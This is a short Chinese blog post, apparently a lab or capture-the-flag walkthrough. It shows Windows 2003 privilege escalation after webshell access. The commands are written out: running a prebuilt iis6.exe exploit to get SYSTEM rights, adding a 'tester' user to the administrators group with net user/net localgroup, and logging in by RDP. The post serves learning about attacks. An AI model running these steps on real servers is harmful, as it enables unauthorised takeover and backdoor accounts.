一、提权
1. 在上一章使用菜刀进入120.203.13.75服务器后能
看到flag文件,C:\flag.txt,但是没有权限,看不到任何内容
2. webshell执行CMD
wshshell:脚本宿主,命令的运行平台
Wscript.shell
2.1. 进入C:\WINDOWS\system32\,找到cmd.exe,但是没有权限执行
2.2. 在E:5\admin\Databackup\中有一个cmd.exe,还有一个iis6.exe,可以执行cmd.exe并且能获取到权限执行whoami,返回nt authority\network service问题:
a. 只是因为system32目录下没有权限吗,这两个cmd.exe有没有什么不同
b. 我从一个win7系统找到一个cmd.exe文件,通过菜刀上传到服务器,执行报错,是否只能找一个win2003的cmd.exe上传并成功执行?
2.3. net user tester 123456 /add,权限不够,只有Administrator才能添加,删除,编辑用户
3. EXP代码通过wmiprvse.exe来获取systme权限漏洞的利用或者证明代码
EXP:利用
POC:证明
iis6.exe 其实就是一个exp成品。它应用了win2003的系统漏洞
3.1 进入iis6.exe所在目录E:5\admin\Databackup\
3.2 执行iis6.exe 'whoami',提示如下:
3.3 iis6.exe "net user tester 123456 /add"
iis6.exe "net localgroup administrators tester /add"
4. mstsc远程连接120.203.13.75服务器使用刚创建的用户tester + 123456登录
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.